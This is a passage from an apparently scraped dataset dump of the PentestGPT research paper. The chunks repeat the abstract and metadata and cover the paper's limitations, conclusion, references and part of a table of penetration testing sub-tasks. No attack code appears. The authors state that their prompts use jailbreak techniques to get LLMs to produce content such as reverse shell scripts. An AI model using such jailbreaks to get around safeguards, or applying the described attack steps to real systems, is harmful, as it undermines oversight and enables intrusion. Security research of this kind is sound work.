We recognize that the penetration testing walkthrough might have been part of the training material for the tested LLMs, potentially biasing the results. To mitigate this, we take two measures. First, we manually verify that the LLM does not have prior knowledge of the target machine. We do this by prompting the LLMs if the tested machine is within their knowledge base. Second, we include penetration test- ing target machines released after 2021 in our benchmark, which falls outside the training data of OpenAI models. The practicality study on the most recent HackTheBox challenges also demonstrates that PENTESTGPT can solve challenges without prior knowledge of the target.
The rapidly evolving nature of LLMs and inconsistencies in available APIs could invalidate PENTESTGPTâs designed prompts. We strive to make prompts general and suitable for various LLMs. However, due to their hacking nature, some LLMs resist generating specific penetration testing content, such as concrete reverse shell scripts. Our prompts include jailbreak techniques [48] to guide the LLM to gener- ate penetration-testing-related information. How to generate
3. Completed Users denotes the number of users globally who have completed the target as of the manuscript submission time. Note that HackTheBox boasts over 670,000 active users.
reproducible outcomes is an important direction we are working towards. | 2308.06782#73 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 74 | reproducible outcomes is an important direction we are working towards.
We identify hallucination in Large Language Mod- els [46] as a significant challenge where the modelâs outputs diverge from its training data. This affects the reliability of our automatic penetration testing tool. We are actively exploring various techniques [49] to reduce hallucination and enhance our toolâs performance. As an ongoing work, we believe such an attempt will lead to a more robust and effective automatic penetration testing tool.
# 8. Conclusion
In this work, we explore the capabilities and limitations of Large Language Models (LLMs) in the context of pen- etration testing. By developing and implementing a novel benchmark, we provide critical insights into how LLMs perform in this intricate domain. We find that LLMs handle fundamental penetration testing tasks and utilize testing tools competently, but they also suffer from context loss and attention issues inherent to their design. | 2308.06782#74 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 75 | Building on these findings, we introduce PENTESTGPT, a specialized tool that simulates human-like behavior in penetration testing. Drawing inspiration from the structure of real-world penetration testing teams, PENTESTGPT features Reasoning, Generation, and Parsing Modules. This design enables a divide-and-conquer approach to problem-solving. Our thorough evaluation of PENTESTGPT reveals its poten- tial and highlights areas where human expertise continues to outpace current technology. Overall, the contributions of this study serve as a valuable resource and offer a promising direction for continued research and development in the essential field of cybersecurity.
15
# References
[1] A. Applebaum, D. Miller, B. Strom, H. Foster, and C. Thomas, âAnal- ysis of automated adversary emulation techniques,â in Proceedings of the Summer Simulation Multi-Conference. Society for Computer Simulation International, 2017, p. 16.
[2] B. Arkin, S. Stender, and G. McGraw, âSoftware penetration testing,â IEEE Security & Privacy, vol. 3, no. 1, pp. 84â87, 2005.
[3] G. Deng, Z. Zhang, Y. Li, Y. Liu, T. Zhang, Y. Liu, G. Yu, and D. Wang, âNautilus: Automated restful api vulnerability detection.â | 2308.06782#75 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 76 | [4] W. X. Zhao, K. Zhou, J. Li, T. Tang, X. Wang, Y. Hou, Y. Min, B. Zhang, J. Zhang, Z. Dong et al., âA survey of large language models,â arXiv preprint arXiv:2303.18223, 2023.
[5] Y. Liu, T. Han, S. Ma, J. Zhang, Y. Yang, J. Tian, H. He, A. Li, M. He, Z. Liu et al., âSummary of chatgpt/gpt-4 research and per- spective towards the future of large language models,â arXiv preprint arXiv:2304.01852, 2023.
J. Wei, Y. Tay, R. Bommasani, C. Raffel, B. Zoph, S. Borgeaud, D. Yogatama, M. Bosma, D. Zhou, D. Metzler et al., âEmergent abilities of large language models,â arXiv preprint arXiv:2206.07682, 2022.
[7] N. Antunes and M. Vieira, âBenchmarking vulnerability detection tools for web services,â in 2010 IEEE International Conference on Web Services. | 2308.06782#76 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 77 | [7] N. Antunes and M. Vieira, âBenchmarking vulnerability detection tools for web services,â in 2010 IEEE International Conference on Web Services.
P. Xiong and L. Peyton, âA model-driven penetration test framework for web applications,â in 2010 Eighth International Conference on Privacy, Security and Trust.
âHackthebox: Hacking training for the best.â [Online]. Available: http://www.hackthebox.com/
[10] [Online]. Available: https://www.vulnhub.com/
[11] âOWASP Foundation,â https://owasp.org/.
[12] âModels - openai api,â https://platform.openai.com/docs/models/, (Accessed on 02/02/2023).
[13] âGpt-4,â https://openai.com/research/gpt-4, (Accessed on 06/30/2023).
[14] Google, âBard,â https://bard.google.com/?hl=en.
[15] Rapid7, âMetasploit framework,â 2023, accessed: 30-07-2023. [Online]. Available: https://www.metasploit.com/ | 2308.06782#77 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 78 | [16] S. Mauw and M. Oostdijk, âFoundations of attack trees,â vol. 3935, 07 2006, pp. 186â198.
[17] [Online]. Available: https://app.hackthebox.com/machines/list/active
penetra- tion https://anonymous.4open.science/r/ EXCALIBUR-Automated-Penetration-Testing/README.md, 2023.
[19] G. Weidman, Penetration testing: a hands-on introduction to hacking. No starch press, 2014.
[20] F. Abu-Dabaseh and E. Alshammari, âAutomated penetration testing: An overview,â in The 4th International Conference on Natural Lan- guage Computing, Copenhagen, Denmark, 2018, pp. 121â129.
[21] J. Schwartz and H. Kurniawati, âAutonomous penetration testing us- ing reinforcement learning,â arXiv preprint arXiv:1905.05965, 2019.
[22] H. Pearce, B. Ahmad, B. Tan, B. Dolan-Gavitt, and R. Karri, âAsleep the keyboard? assessing the security of github copilotâs code at contributions,â in 2022 IEEE Symposium on Security and Privacy (SP). | 2308.06782#78 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 79 | [23] H. Pearce, B. Tan, B. Ahmad, R. Karri, and B. Dolan-Gavitt, âExam- ining zero-shot vulnerability repair with large language models,â in 2023 IEEE Symposium on Security and Privacy (SP). IEEE, 2023, pp. 2339â2356.
[24] âOWASP Juice-Shop Project,â https://owasp.org/ www-project-juice-shop/, 2022.
16
# [25] [Online]. Available: https://nmap.org/ [26] MITRE, âCommon Weakness Enumeration (CWE),â https://cwe.
mitre.org/index.html, 2021.
[27] E. Collins, âLamda: Our breakthrough conversation technology,â May 2021. [Online]. Available: https://blog.google/technology/ai/lamda/
[28] âNew chat,â https://chat.openai.com/, (Accessed on 02/02/2023). [29] âThe most advanced penetration testing distribution.â [Online].
Available: https://www.kali.org/ | 2308.06782#79 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 80 | Available: https://www.kali.org/
[30] S. Inc., âNexus vulnerability scanner.â [Online]. Available: https: //www.sonatype.com/products/vulnerability-scanner-upload
[31] S. Rahalkar and S. Rahalkar, âOpenvas,â Quick Start Guide to Pen- etration Testing: With NMAP, OpenVAS and Metasploit, pp. 47â71, 2019.
[32] B. Guimaraes and M. Stampar, âsqlmap: Automatic SQL injection and database takeover tool,â https://sqlmap.org/, 2022.
[33] J. Yeo, âUsing penetration testing to enhance your companyâs secu- rity,â Computer Fraud & Security, vol. 2013, no. 4, pp. 17â20, 2013. [34] A. Vaswani, N. Shazeer, N. Parmar, J. Uszkoreit, L. Jones, A. N. Gomez, L. Kaiser, and I. Polosukhin, âAttention is all you need,â 2023. | 2308.06782#80 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 81 | [35] Y. Bang, S. Cahyawijaya, N. Lee, W. Dai, D. Su, B. Wilie, H. Lovenia, Z. Ji, T. Yu, W. Chung et al., âA multitask, multilingual, multimodal evaluation of chatgpt on reasoning, hallucination, and interactivity,â arXiv preprint arXiv:2302.04023, 2023.
[36] J. Wei, X. Wang, D. Schuurmans, M. Bosma, B. Ichter, F. Xia, E. Chi, Q. Le, and D. Zhou, âChain-of-thought prompting elicits reasoning in large language models,â 2023. | 2308.06782#81 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 82 | [37] H. S. Lallie, K. Debattista, and J. Bal, âA review of attack graph and attack tree visual syntax in cyber security,â Computer Science Review, vol. 35, p. 100219, 2020. [Online]. Available: https: //www.sciencedirect.com/science/article/pii/S1574013719300772 [38] K. Barbar, âAttributed tree grammars,â Theoretical Computer Science, vol. 119, no. 1, pp. 3â22, 1993. [Online]. Available: https://www.sciencedirect.com/science/article/pii/030439759390337S [39] H. Sun, X. Li, Y. Xu, Y. Homma, Q. Cao, M. Wu, J. Jiao, and D. Charles, âAutohint: Automatic prompt optimization with hint generation,â 2023.
[40] Sep 2018. carrier/963 [Online]. Available: https://forum.hackthebox.com/t/
[41] âNikto web server scanner.â [Online]. Available: https://github.com/ sullo/nikto
[42] [Online]. Available: https://openai.com/blog/chatgpt-plugins# code-interpreter | 2308.06782#82 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 83 | [42] [Online]. Available: https://openai.com/blog/chatgpt-plugins# code-interpreter
threaded java application designed to brute force directories and files names on web/application servers.â [Online]. Available: https://github.com/KajanM/DirBuster
[44] J. Wang, X. Yi, R. Guo, H. Jin, P. Xu, S. Li, X. Wang, X. Guo, C. Li, X. Xu et al., âMilvus: A purpose-built vector data management system,â in Proceedings of the 2021 International Conference on Management of Data, 2021, pp. 2614â2627.
[45] R. Guo, X. Luan, L. Xiang, X. Yan, X. Yi, J. Luo, Q. Cheng, W. Xu, J. Luo, F. Liu et al., âManu: a cloud native vector database management system,â Proceedings of the VLDB Endowment, vol. 15, no. 12, pp. 3548â3561, 2022.
[46] M. Zhang, O. Press, W. Merrill, A. Liu, and N. A. Smith, âHow language model hallucinations can snowball,â arXiv preprint arXiv:2305.13534, 2023. | 2308.06782#83 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 84 | [47] [Online]. Available: https://www.vulnhub.com/entry/hackable-ii,711/ [48] Y. Liu, G. Deng, Z. Xu, Y. Li, Y. Zheng, Y. Zhang, L. Zhao, T. Zhang, and Y. Liu, âJailbreaking chatgpt via prompt engineering: An empirical study,â arXiv preprint arXiv:2305.13860, 2023. [49] P. Manakul, A. Liusie, and M. J. Gales, âSelfcheckgpt: Zero-resource black-box hallucination detection for generative large language mod- els,â arXiv preprint arXiv:2303.08896, 2023.
TABLE 6: Summarized 26 types of sub-tasks in the proposed penetration testing benchmark. | 2308.06782#84 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 85 | Description Utilize various security tools for scanning, probing, and analyzing vulnerabilities in the target system. Identify the open ports and related information on the target machine. Gather detailed information about the targetâs web applications, including directory structure, available services, and underlying technologies. Review the targetâs source code to find vulnerabilities that may lead to unauthorized access or other malicious activities. Craft and utilize shell codes to manipulate the target system, often enabling control or extraction of data. Traverse and manipulate directories to discover sensitive files, misconfigurations, or hidden information on the target system. Identify and exploit weaknesses in permissions to gain higher-level access to systems or data. Locate and retrieve specific data markers (âflagsâ) often used in Capture The Flag (CTF) challenges to prove that a system was successfully penetrated. Utilize tools and techniques to decipher or crack passwords and cryptographic hash values for unauthorized authentication. Identify and exploit vulnerabilities within the network infrastructure to gain unauthorized access or disrupt services. Inject arbitrary commands to be run on a host machine, often leading to unauthorized system control. Manipulate user access controls to escalate privileges or gain | 2308.06782#85 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial 